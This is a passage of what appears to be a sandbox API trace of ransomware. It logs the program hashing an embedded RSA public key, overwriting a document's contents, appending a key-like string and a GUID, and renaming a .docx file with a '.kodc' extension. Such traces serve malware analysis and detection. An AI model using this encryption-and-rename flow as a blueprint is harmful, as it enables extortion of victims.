lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x5e75, lpOverlapped=0x0) returned 1 [0098.461] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.461] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.461] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.461] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.462] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.463] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.463] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.463] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.463] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.463] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.463] GetLastError () returned 0x0 [0098.463] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.463] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.463] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.463] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.463] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.463] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.463] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.463] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.463] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.463] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x5e80) returned 0x9ba4d90 [0098.463] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.463] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.464] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.464] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.464] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.464] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.464] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d180 [0098.464] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a9e8 [0098.464] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d1c8 [0098.464] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa00 [0098.464] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa30 [0098.464] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.464] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa48 [0098.464] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.464] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.464] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.464] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0098.464] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa30 | out: hHeap=0x630000) returned 1 [0098.464] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa48 | out: hHeap=0x630000) returned 1 [0098.464] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.464] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.464] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.464] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.464] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0098.464] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331aa48 [0098.464] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0098.464] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331aa30 [0098.464] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0098.465] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0098.465] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.465] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.465] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.465] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0098.465] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.465] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.465] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.465] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa48 | out: hHeap=0x630000) returned 1 [0098.465] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.465] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa30 | out: hHeap=0x630000) returned 1 [0098.465] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.465] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.465] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.465] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.465] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.465] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.465] GetCurrentThreadId () returned 0x42c [0098.465] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.465] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8ee48 [0098.465] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.465] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.465] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.465] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.465] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.466] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.466] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.466] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.466] GetCurrentThreadId () returned 0x42c [0098.466] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.466] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.466] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.466] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.466] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.466] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.466] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.466] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.466] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.466] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.466] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.466] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.466] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.466] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.466] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.466] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.466] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.466] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.466] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.466] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.466] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.466] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.467] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.467] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa30 [0098.467] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.467] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0098.467] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.467] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.467] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.467] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.467] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.467] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa48 [0098.467] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.467] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.467] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.467] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa18 [0098.467] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.467] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.467] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.467] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.467] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.467] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.467] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.467] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331aa60 [0098.467] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.467] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a538 [0098.467] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.467] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0098.468] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.468] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.468] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.468] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0098.468] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa30 | out: hHeap=0x630000) returned 1 [0098.468] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa30 [0098.468] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.468] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0098.468] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.468] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0098.468] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.468] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0098.468] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0098.468] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c770 [0098.468] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.468] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0098.468] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa30 | out: hHeap=0x630000) returned 1 [0098.468] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0098.468] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.468] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.469] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.469] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.469] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0098.469] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0098.469] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0098.469] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.469] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.469] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0098.469] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.469] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.469] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa60 | out: hHeap=0x630000) returned 1 [0098.469] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.469] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.469] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.469] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa48 | out: hHeap=0x630000) returned 1 [0098.469] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa18 | out: hHeap=0x630000) returned 1 [0098.469] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0098.469] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0098.469] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0098.469] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa00 | out: hHeap=0x630000) returned 1 [0098.469] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9d1c8 | out: hHeap=0x630000) returned 1 [0098.470] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0098.470] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0098.470] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0098.470] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.470] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0098.470] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.470] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.470] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.470] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.470] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.470] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0098.470] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0x5e70, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x5e70, lpOverlapped=0x0) returned 1 [0098.470] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0098.470] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5e75, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.470] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.470] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.470] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0098.470] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333a888 [0098.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333a888, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.470] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0098.471] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.471] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0098.471] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0098.471] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.471] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.471] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.471] CloseHandle (hObject=0x5cc) returned 1 [0098.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.472] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0098.472] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.472] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MeuD nPJ7M67.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\meud npj7m67.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MeuD nPJ7M67.docx.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\meud npj7m67.docx.kodc")) returned 1 [0098.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.473] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.474] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.474] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0098.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0098.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dab0 [0098.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xfc) returned 0x69b948 [0098.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0098.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce3a8 [0098.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce7b8 [0098.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332e140 [0098.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce068 | out: hHeap=0x630000) returned 1 [0098.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce750 | out: 